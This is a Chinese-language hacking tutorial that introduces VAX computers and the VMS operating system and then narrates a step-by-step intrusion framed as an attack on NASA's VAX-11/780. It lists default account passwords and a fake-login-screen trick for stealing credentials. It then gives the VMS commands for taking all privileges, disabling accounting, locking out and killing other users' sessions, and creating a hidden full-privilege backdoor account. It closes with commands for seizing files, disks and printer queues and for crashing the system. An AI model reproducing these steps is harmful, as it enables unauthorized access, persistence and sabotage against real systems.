警告：本章涉及某些軍事機(jī)密，所以在某些地方作了模糊處理。本文危險(xiǎn)度極高，請勿模仿?？潜疚牡哪康氖菫榱俗尨蠹覍AX計(jì)算機(jī)和VMS操作系統(tǒng)有所了解。

在一些黑客入侵活動中，很多黑客根本就不屑于入侵那些的小得可憐的漏洞網(wǎng)站，因?yàn)檫@對那些喜歡刺激的黑客來說，根本就不算什么。用他們的話來說，入侵那些網(wǎng)站只是他們在大腦疲勞時(shí)作的一種休閑游戲而已。而對于這些危險(xiǎn)級的黑客來說，他們真正感興趣的是那些平時(shí)難得一見放在重要機(jī)構(gòu)和實(shí)驗(yàn)室里的計(jì)算機(jī)，只有那些東西能夠真正的刺激起他們的大腦神經(jīng)系統(tǒng)的活躍，也是真正能夠讓他們提起胃口的東西。

在這些眾多的提味劑中被美國太空總署、美國中央情報(bào)局等重要機(jī)構(gòu)青睞的VAX計(jì)算機(jī)和它的VMS操作系統(tǒng)成為了超級黑客們的最愛，這些東西都能夠刺激他們不斷的研究試圖入侵這些重要機(jī)構(gòu)的每一次微小的機(jī)會。

什么是VAX計(jì)算機(jī)？VMS操作系統(tǒng)是什么？

欲讀懂后面的黑客手記，請先了解下面所講的基礎(chǔ)知識。

那么什么是VAX計(jì)算機(jī)？VMS操作系統(tǒng)又是什么？以下我們就簡單地介紹一下這些擺放在實(shí)驗(yàn)室里的大型機(jī)核心系統(tǒng)。

在1978年，DEC公司建立了第一個(gè)基于VAX（ virtual address extension）即虛擬地址擴(kuò)展的計(jì)算機(jī)體系，它是DEC計(jì)算機(jī)系統(tǒng)特有的復(fù)雜指令計(jì)算（CISC）體系結(jié)構(gòu)的計(jì)算機(jī)VAX11、780。這臺大家伙在當(dāng)時(shí)是基本32位的計(jì)算機(jī)，并且能夠有高達(dá)1MIPS的運(yùn)算性能。在那個(gè)年代，這臺計(jì)算機(jī)的速度和性能都是無與倫比的。在當(dāng)時(shí)要值$200,000。但顯然他是最棒的。

更加值得一提的是VAX是多用戶系統(tǒng)，它所采用的網(wǎng)絡(luò)應(yīng)用包括：

通信終端協(xié)議（CTERM）：DNA為VMS系統(tǒng)提供的虛擬終端服務(wù)使用該協(xié)議，可以用于任何連接，是LAT的可選協(xié)議。

分布式命名服務(wù)（DNS）：DNS為VMS系統(tǒng)的通用命名服務(wù)，允許對用戶、文件和節(jié)點(diǎn)等進(jìn)行命名，使其成為整個(gè)網(wǎng)絡(luò)共知的標(biāo)識。

數(shù)據(jù)存取協(xié)議（DAP）：DAP是為VMS系統(tǒng)提供遠(yuǎn)程文件存取的老的協(xié)議集。DAP將被DFS所代替。

分布式文件系統(tǒng)（DFS）：和網(wǎng)絡(luò)文件系統(tǒng)相似，目錄可以標(biāo)識為共享，并且能夠裝到遠(yuǎn)程節(jié)點(diǎn)上。

分布式隊(duì)列服務(wù)（DQS）：主要用來進(jìn)行打印處理，該服務(wù)使VMS能夠在網(wǎng)上作業(yè)隊(duì)列?！白鳂I(yè)控制”將作業(yè)從隊(duì)列中移出，并將其傳至協(xié)同程序，由它來處理作業(yè)。

VAX計(jì)算機(jī)專用的終端只能用于VAX系統(tǒng)上，并且可能用于Internet服務(wù)，它的唯一性和不兼容性保持著它的安全基礎(chǔ)。但是對一個(gè)非常了解VAX系統(tǒng)的黑客來說這些并不算是什么，他們一樣可以利用PC機(jī)上的軟件來同VAX系統(tǒng)取得連接，并會想方設(shè)法摧毀他們，但是每一個(gè)黑客的必須要有一個(gè)VT100的終端仿真程序，當(dāng)然這并不難搞到。

那么什么是VMS哪？VMS（Virtual Memory System）即虛擬內(nèi)存系統(tǒng)，是比較特別的一種計(jì)算機(jī)網(wǎng)絡(luò)操作系統(tǒng)，但是VMS和其他的系統(tǒng)還是有那么一些相似之處的，比如它的登錄介面就比較象UNIX系統(tǒng)的。你首先看到的是一個(gè)登錄信息Username:；接下來便是用戶密碼： password:如果你能夠正確的輸入信息的話，那么你就會進(jìn)到一個(gè)以$為提示符的字符操作環(huán)境下。當(dāng)你登錄成功后，還會有一系列的提示信息，包括你的username,你的process ID,等等。如下表：（此表欠奉：）

對于一個(gè)熟悉操作系統(tǒng)的黑客來說，他會很快地感覺到VMS這個(gè)系統(tǒng)和其他的系統(tǒng)如UNIX等操作系統(tǒng)基本一樣，一個(gè)優(yōu)秀的黑客在短期內(nèi)都會將它使用得很得心應(yīng)手，對于他們來說這些系統(tǒng)的唯一區(qū)別只是命令提示不太一樣而已。舉個(gè)例子，如果UNIX系統(tǒng)中的C shell要調(diào)用設(shè)備的話，就要在命令行輸入SHELL設(shè)備的調(diào)用命令。而VMS中假設(shè)調(diào)用的這個(gè)設(shè)備就是history（Dos有相應(yīng)的模塊，叫做Dos提示符），VMS系統(tǒng)中，如果你一直按住Ctrl鍵，并且輸入字符B，那么就會停止其他形式的命令進(jìn)程，列出所有目前的進(jìn)程，返回進(jìn)程，并且報(bào)告目前的用戶統(tǒng)計(jì)，以便進(jìn)行修改。想要入侵VMS這些都是必備的基礎(chǔ)知識。

當(dāng)然在Internet上還存在許多的VAM系統(tǒng)的服務(wù)器，而且至今來說這個(gè)古老的VMS系統(tǒng)還是很有活力的，當(dāng)然他仍然在不但地進(jìn)行血液的更新，VMS最新的操作系統(tǒng)叫做Open/VMS網(wǎng)絡(luò)操作系統(tǒng)。OpenVMS主要可以運(yùn)行在VAX和Alpha系統(tǒng)的主機(jī)上，Alpha是一個(gè)非?？斓墓ぷ髡鞠到y(tǒng)，而且它可以運(yùn)行Windows NT，OpenVMS，Digital UNIX等多種系統(tǒng)。這是黑客們夢寐以求的東西，在早些時(shí)候許多的黑客為了追求到Alpha工作站，寧肯放棄高薪而去一些麻木而沒有活力的科研機(jī)構(gòu)。

目前公共在線的VAX主機(jī)大都已經(jīng)時(shí)間比較長了，比如美國多所大學(xué)的圖書館的系統(tǒng)，那些都已經(jīng)非常非常old的VAX系統(tǒng)了。但是在那里我們可以了解到一些VAX/VMS和詳細(xì)的情況，這些對于一個(gè)對VAX一無所知的人來說是一個(gè)很好的機(jī)會。

VMS系統(tǒng)的安全情況

想要入侵這些重要的機(jī)構(gòu)，黑客們必須了解VMS網(wǎng)絡(luò)系統(tǒng)的安全性。在VMS系統(tǒng)中安全是經(jīng)過精心考慮的，因?yàn)檫@些大家伙都是使用在一些重要的研究和軍事機(jī)構(gòu)里的，安全問題成為了VMS的重要性能。比如，VMS基本上都有一個(gè)強(qiáng)有力的有讀寫控制，（當(dāng)然這些都還要看系統(tǒng)管理員的設(shè)置情況而定）。在VMS系統(tǒng)中的讀寫控制和Novel Netware 平臺下的類似，下面就是它所提供的簡單的控制命令：

Time（時(shí)間）：你可以控制哪一天，哪個(gè)用戶，可以在哪個(gè)小時(shí)來訪問這個(gè)系統(tǒng)，默認(rèn)為一個(gè)星期7天，一天24小時(shí)，就象是防火墻一樣，你可以精確的控制每一個(gè)用戶。

Resources（資源）：你可以控制每一個(gè)登錄用戶的訪問權(quán)限，可以對每一個(gè)目錄設(shè)置權(quán)限。

當(dāng)然這些都只是VMS系統(tǒng)對于訪問控制的一個(gè)簡單的舉例而己。實(shí)際上，在VMS系統(tǒng)中還有多重的特權(quán)限制，并且可以用于工作組。換句話說，在VMS系統(tǒng)中，讀寫控制是一個(gè)非常繁雜的設(shè)置，有好多好多的選項(xiàng)。正是由于這個(gè)原因，因此很少有黑客能夠突破這個(gè)系統(tǒng)。有時(shí)，這種繁雜的設(shè)置反而會成為它自身帶給網(wǎng)管們的一項(xiàng)非常繁重的工件。這個(gè)星球上的聰明的黑客已經(jīng)意識到了這一點(diǎn)了：

VMS系統(tǒng)的最大的優(yōu)點(diǎn)就是它的巨大的靈活性。系統(tǒng)管理員可以選擇實(shí)現(xiàn)或是忽略這種復(fù)雜的設(shè)置，那么就會給黑客留下機(jī)會了。

攻擊一個(gè)VAX（或是以VMS作為操作系統(tǒng)）的網(wǎng)絡(luò)操作系統(tǒng)來說，同攻擊UNIX系統(tǒng)有很大的不同，首先VMS這個(gè)系統(tǒng)的password文件的存放和它的結(jié)構(gòu)和UNIX有很大的不同，UNIX系統(tǒng)下是放在/etc/passwd 這個(gè)文件中，這個(gè)文件包括定義的用戶名，password，登錄信息，以及它所在的工作組。與此對比，VMS系統(tǒng)的這個(gè)文件不但包括以上這些簡單的信息，還有好多的其他的信息：

在每一個(gè)運(yùn)行VMS的DEC主機(jī)都會將所有用戶的檔案資料放在一個(gè)文件當(dāng)中，叫做SYSUAF（System User Authorization File）對于每一個(gè)使用此系統(tǒng)的用戶包括系統(tǒng)管理員，都有一個(gè)record來記錄下用戶的登錄時(shí)間和訪問權(quán)限，而且它還給出了password的詳細(xì)的時(shí)間，password的長度，以及用戶登錄時(shí)所有的詳細(xì)信息。這真讓黑客頭疼。

但是就是這種難以理解的password文件結(jié)構(gòu)也有它自身的漏洞，那就是如果一個(gè)黑客成功的獲得了對這個(gè)文件操作的權(quán)力，并且修改了它，那么整個(gè)系統(tǒng)都將面臨危險(xiǎn)，然而發(fā)生這種情況的可能性微乎其微。

一般情況下用戶通過一種叫做UIC（User Identification Code）(用戶識別碼)的程序才能登錄系統(tǒng)。這和UNIX系統(tǒng)中的GID是非常相近的。它識別出登錄用戶，還有該用戶的訪問權(quán)限，以及工作組，因此，你可以想象這種UIC系統(tǒng)是一個(gè)統(tǒng)一的數(shù)據(jù)庫。#p#

攻擊美國太空總署Vax-11/780，我想看看美國到底登上月球了嗎，有沒有外星人跟他們接觸，天哪，這一切都是那么的神氣，對我就像是一塊磁鐵，將我所有的激情和目光都拉上了這個(gè)地方。http://www.nasa.gov就是他的老巢，但是我對這個(gè)并不感興趣，因?yàn)樗粯硬捎玫亩际瞧胀ǖ腤EB服務(wù)器。我的目標(biāo)是突破它的內(nèi)部網(wǎng)絡(luò)，也就是NASA的科研核心網(wǎng)絡(luò)。

入侵美國太空總署第一步：登錄

有兩種方法可以登錄VMS系統(tǒng)。第一種是正常登錄，另外一種就是利用試探密碼以及欺騙。我們是黑客，優(yōu)秀的黑客！我們當(dāng)然選擇欺騙（Cheating）登陸，如果你想要成功的混進(jìn)VAX系統(tǒng)，你可以利用兩種方法：

1、用利用系統(tǒng)中現(xiàn)有的其他人的用戶名和密碼。

2、利用默認(rèn)的密碼進(jìn)行欺騙進(jìn)入。

(1)利用其他人的密碼：

這種方法既有好的一面，也有不好的一面，好的一方面是你不必新建一個(gè)帳號，或是用一個(gè)受限制的帳號，那么在這種情況下系統(tǒng)管理員什么都不會覺察到，壞的一方面就是你所利用的帳號的主人可能會注意到。你想想，如果他并沒有登錄，但是又顯示它在線，他會有什么感覺，而且會留下登陸的種種記錄，并且他這個(gè)帳號還可能沒有我們所需要獲得的權(quán)限。獲得其他人的密碼比較簡單，只要你進(jìn)入系統(tǒng)，即使只是很小的權(quán)限，那么你只要向系統(tǒng)管理員的機(jī)器發(fā)送一個(gè)程序，有點(diǎn)類似于現(xiàn)在的木馬或者是欺騙工具。它包含如同登錄時(shí)需要的屏幕一樣，那么，你就可能獲得他的密碼，還有用戶帳號，再把這個(gè)文件從遠(yuǎn)程的打印機(jī)打印出來或是輸出到一個(gè)文件上，當(dāng)然你一定記得要把這個(gè)文件刪除掉。

(2)利用系統(tǒng)的默認(rèn)的密碼：

在VAX系統(tǒng)建立時(shí)，有4個(gè)默認(rèn)的用戶帳號還有密碼，它有可能被自修改或是刪除，但是系統(tǒng)管理員通常有可能會遺留下一兩個(gè)以備將來系統(tǒng)遇到麻煩的時(shí)候進(jìn)行恢復(fù)工作，這4個(gè)帳號和密碼分別是：

Name Password  
SYSTEM MANAGER or OPERATOR  
FIELD SERVICE or TEST  
DEFAULT USER or DEFAULT  
SYSTEST UETP or SYSTEST 

我的經(jīng)驗(yàn)告訴我，一般來說FIELD SERVICE這個(gè)帳號都會起作用。一旦我們登錄了該系統(tǒng)，如果你想要獲得最高的權(quán)限，你就應(yīng)該輸入：

$SET PROC/PRIV=ALL

‘$’是系統(tǒng)提示，如果你要是本身獲得的權(quán)限不夠，就會系統(tǒng)提示你不能夠執(zhí)行該命令，那么你就要換一個(gè)password，才能得到你想要的特權(quán)。是不是很令我們頭疼？不過一般的情況下方法還是奏效的。

入侵美國太空總署第二步：瀏覽該系統(tǒng)

成功的利用完第一步，我們已經(jīng)可以順利的在VMS系統(tǒng)上登陸了，下一步要做什么呢？當(dāng)然是要獲取更多的信息，但是首先，我們一定要確認(rèn)是否能夠返回，那么我們就先要這樣做：

$SET ACCOUNTING/DISABLE

這將會禁止VMS系統(tǒng)中那個(gè)討厭的跟蹤程序?qū)ξ覀兊母櫍佥斎耄?/P>

$SHOW USERS

看一看誰在系統(tǒng)上，如果你看到我們自己的帳號是兩個(gè)的話，趕快退出來。我們不想因?yàn)樽錾凳露蛔桨?，但是我們一旦確認(rèn)無人能夠監(jiān)視我們的行動，那么我們接下來就輸入：

$SET LOGINS/INTERACTIVE=0

這將禁止其他人登錄到這臺機(jī)器上，下一步就要把其他的人踢出去。

$SHOW USERS

系統(tǒng)可能返回如下的信息：

VAX/VMS INTERACTIVE USERS  
23-JUL-2000 09:37:15.54  
Total number of interactive users= 6  
Username Process Name PID Terminal  
BRUNO BRUNO 0000026B TTD3:  
FIELD FIELD 00000FF2 TTC2:  
JOHNSON _TTD5: 0000026D TTD5:  
LINCOLN LINCOLN 0000026A TTD2:  
CYBERPUNK CYBERPUNK 000001D8 TTD4:  
HARDCORE HARDCORE 00000263 TTC0: 

現(xiàn)在，如果你以FIELD用戶名登錄的話，我們要通過驗(yàn)證的話，輸入：

$STOP/ID=PID

這樣的話，就可以顯示除我們之外的用戶的情況，并且把的用戶踢出去，最好在晚上用戶少時(shí)這樣做，因?yàn)槿绻脩艄芾韱T收到好多的控訴信息的話，他就可能會發(fā)現(xiàn)并捉住你。接下來，我們要確認(rèn)，我們能夠再次登錄到這個(gè)系統(tǒng)上，為了能達(dá)到這一點(diǎn)：

$SET DEF SYS$SROOT:[SYSEXE]

這樣的話，你將進(jìn)入到SYS$SROOT的SYSEXE目錄下一行：

$RUN AUTHORIZE

系統(tǒng)返回如下信息：

UAF> - now type:  
UAF> ADD WASTOID /PASSWORD=  
 
ZEDNET /UIC=[099,900] /CPUTIME=0-   
/DEVICE=SYS$SYSROOT /DIRECTORY=  
 
[SYSEXE] /PRIVS=ALL /NOACCOUNTING   
UAF> EXIT   

這是什么意思呢，讓我們往下做：

ADD WASTOID－加入一個(gè)記錄名字叫WASTOID

/PASSWORD=ZEDNET－為新帳號加密碼

/CPUTIME=0－將你的帳號的訪問時(shí)間變?yōu)椴幌迺r(shí)，

/UIC=[099,900]

/DEVICE=SYS$SYSROOT－設(shè)置你的工作驅(qū)動器

/DIRECTORY=[SYSEXE]－設(shè)置你的工作目錄

/PRIVS=ALL－獲得最高的操作權(quán)限

/NOACCOUNTING－禁止系統(tǒng)跟蹤

好了，你現(xiàn)在就有了所有的特權(quán)，并且有了合法的帳號，返回系統(tǒng)。

入侵美國太空總署第三步：系統(tǒng)的基礎(chǔ)

如果你從沒有用過VAX系統(tǒng)的話，可以看一下這些提示：

HELP－將會列出所有的命令，并且能夠給你詳細(xì)的解釋

SET DEF drive:[directory.sub1,sub2]－設(shè)置默認(rèn)的工作驅(qū)動器還有工作目錄

TYPE或是T－和DOS下的TYPE一樣，是顯示文件內(nèi)容的：如T file.txt

PRINT或是PR－打印文件，如：PR file.txt

DIR或是D－顯示工作目錄

DIR/PRINT 或D/PRINT在屏幕和打印機(jī)上同時(shí)顯示。

RUN或是R－執(zhí)行.exe的可執(zhí)行文件，如：r filename.exe

好了，準(zhǔn)備的比較充分了

入侵美國太空總署第四步：開工了

1、修改文件：

這個(gè)世界上最美好的事情就是剝奪他本人的文件的控制權(quán)了，當(dāng)你看到他對自己的文件束手無策時(shí)，我們可能會高興手舞足蹈。讓我們偷著樂吧。你可以用：set protection 這個(gè)命令，如果你想一個(gè)文件只能由你自己訪問，而其他的任何人都無權(quán)訪問時(shí)，你可以運(yùn)行

$set prot=(s:rwed,o,g,w) test.dat

你就有了完全的特權(quán)，其他的人包括文件的擁有者，工作組，以及管理員都沒有權(quán)限。

2、磁盤：

你可以對整個(gè)磁盤都一次加以控制，比如你要控制驅(qū)動器：dirver1

$dismount driver1  
$deallocate driver1  
$set prot(s,o;r,g,w)/device/owner_vic[099,900] driver1  
$allocate driver1  
$mount driver1 

這樣你就有了一個(gè)個(gè)人控制的驅(qū)動器了。

3、打印機(jī)：

我們知道如果要打印一個(gè)文件只要輸入：

$pr hacking.dat

如果運(yùn)行

$stop/abort lpao

那么，系統(tǒng)就會停止打印機(jī)目前的工作并將它踢出隊(duì)列。

$delete/queve lpao

這會將隊(duì)列中所有的項(xiàng)目全部清除，那么打印機(jī)就是你一個(gè)人的了。如此等等，我們只介紹幾種，其他的就看你自己的了。

入侵美國太空總署第五步，安全撤退

1、opccrash

如果要關(guān)閉系統(tǒng)的話：

$run sys$system:opccrash

系統(tǒng)會提示：

system shutdown complete –use console to halt system(請使用控制臺來關(guān)閉系統(tǒng))

輸入：

^P  
>>>-type:  
>>>HALT  
HALTED AT 8000708A 

2、破壞性退出

^P  
>>>HALT  
>>>@CRASH 

這樣一整套入侵美國太空總署的行動，就讓我們躲在一邊偷偷看那些老外們忙活去吧，當(dāng)然我們也不能忘記“正事”，這就是進(jìn)入它的數(shù)據(jù)庫，看看那些他們的小秘密。

【編輯推薦】

1. 網(wǎng)站安全測試和審計(jì)實(shí)例
2. 深入淺出實(shí)戰(zhàn)攻防惡意PDF文檔
3. 記一次前所未有巧妙的Hacking入侵
4. 解密:如何利用插座和廉價(jià)激光器竊取數(shù)據(jù)
5. 安全試驗(yàn)：如何通過代理服務(wù)器發(fā)動DDoS攻擊